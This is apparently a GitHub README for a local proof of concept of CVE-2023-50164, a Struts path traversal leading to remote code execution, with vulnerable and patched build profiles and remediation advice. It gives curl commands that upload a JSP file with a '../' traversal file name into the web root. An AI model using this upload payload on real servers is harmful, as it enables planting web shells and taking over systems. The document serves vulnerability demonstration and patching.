Skip to content

Latest commit

 

History

History
60 lines (42 loc) · 2.11 KB

README.md

File metadata and controls

60 lines (42 loc) · 2.11 KB

This is a Proof of Concept (PoC) for CVE-2023-50164, which outlines a new path traversal vulnerability which can lead to Remote Code Execution (RCE) in struts-core.

To remediate the issue, it is advised that you update to Struts 2.5.33 or Struts 6.3.0.2 or greater.

This repo builds off the excellent work of Henrik Plate found here.

Run the PoC

There are two maven profiles in this project: vuln and no-vuln. vuln is the default.

To run with the RCE vuln, execute the following:

mvn clean jetty:run -P vuln

To run without the RCE vuln, execute the following:

mvn clean jetty:run -P no-vuln

The difference between the two profiles is vuln uses struts-core version 6.3.0.1 (which has the path traversal vulnerability) and no-vuln uses struts-core version 6.3.0.2 (which does not have the path traversal vulnerability)

Exploit the Vuln

while running the vuln profile described above, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll be able to see the file rogue.jsp in the src/main/webapp folder and you can browse to it at: http://localhost:9999/struts-vuln-poc/rogue.jsp (you'll see a Ya been PWNED! message).

There is a code fix solution that works with the older Struts versions, but, it is still highly advised to update your version of Struts.

To exercise the code fix, execute the following:

curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"

You'll see an error message: Attempted path traversal attack

NOTE: If you use the no-vuln profile, you won't get an error message from the /upload-no-vuln endpoint, even if you use a relative path like: ../src/main/webapp/rogue.jsp, as the new version of struts automatically strips away relative path references.